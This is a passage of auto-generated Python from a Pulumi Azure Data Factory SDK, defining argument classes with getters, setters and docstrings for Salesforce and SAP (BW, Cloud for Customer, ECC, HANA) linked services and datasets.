@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class SalesforceMarketingCloudObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Salesforce Marketing Cloud dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SalesforceMarketingCloudObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SalesforceObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
object_api_name: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Salesforce object dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param Any object_api_name: The Salesforce object API name. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SalesforceObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if object_api_name is not None:
pulumi.set(__self__, "object_api_name", object_api_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="objectApiName")
def object_api_name(self) -> Optional[Any]:
"""
The Salesforce object API name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "object_api_name")
@object_api_name.setter
def object_api_name(self, value: Optional[Any]):
pulumi.set(self, "object_api_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SapBWLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
server: Any,
system_number: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
SAP Business Warehouse Linked Service.
:param Any client_id: Client ID of the client on the BW system. (Usually a three-digit decimal number represented as a string.) Type: string (or Expression with resultType string).
:param Any server: Host name of the SAP BW instance. Type: string (or Expression with resultType string).
:param Any system_number: System number of the BW system. (Usually a two-digit decimal number represented as a string.) Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to access the SAP BW server.
:param Any user_name: Username to access the SAP BW server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "system_number", system_number)
pulumi.set(__self__, "type", 'SapBW')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
Client ID of the client on the BW system. (Usually a three-digit decimal number represented as a string.) Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
Host name of the SAP BW instance. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter(name="systemNumber")
def system_number(self) -> Any:
"""
System number of the BW system. (Usually a two-digit decimal number represented as a string.) Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "system_number")
@system_number.setter
def system_number(self, value: Any):
pulumi.set(self, "system_number", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password to access the SAP BW server.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
Username to access the SAP BW server. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SapCloudForCustomerLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for SAP Cloud for Customer.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The URL of SAP Cloud for Customer OData API. For example, 'https://[tenantname].crm.ondemand.com/sap/c4c/odata/v1'. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication.
:param Any username: The username for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'SapCloudForCustomer')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of SAP Cloud for Customer OData API. For example, 'https://[tenantname].crm.ondemand.com/sap/c4c/odata/v1'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The username for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SapCloudForCustomerResourceDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
path: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
SAP Cloud for Customer OData resource dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any path: The path of the SAP Cloud for Customer OData entity. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "path", path)
pulumi.set(__self__, "type", 'SapCloudForCustomerResource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def path(self) -> Any:
"""
The path of the SAP Cloud for Customer OData entity. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Any):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SapEccLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
Linked service for SAP ERP Central Component (SAP ECC).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[str] url: The URL of SAP ECC OData API. For example, 'https://hostname:port/sap/opu/odata/sap/servicename/'. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[str] encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication.
:param pulumi.Input[str] username: The username for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'SapEcc')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> pulumi.Input[str]:
"""
The URL of SAP ECC OData API. For example, 'https://hostname:port/sap/opu/odata/sap/servicename/'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: pulumi.Input[str]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[pulumi.Input[str]]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Either encryptedCredential or username/password must be provided. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
The username for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SapEccResourceDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
path: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
SAP ECC OData resource dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any path: The path of the SAP ECC OData entity. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "path", path)
pulumi.set(__self__, "type", 'SapEccResource')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def path(self) -> Any:
"""
The path of the SAP ECC OData entity. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Any):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SapHanaLinkedServiceArgs:
def __init__(__self__, *,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
SAP HANA Linked Service.
:param Any server: Host name of the SAP HANA server. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the SAP HANA server.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password to access the SAP HANA server.
:param Any user_name: Username to access the SAP HANA server. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'SapHana')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
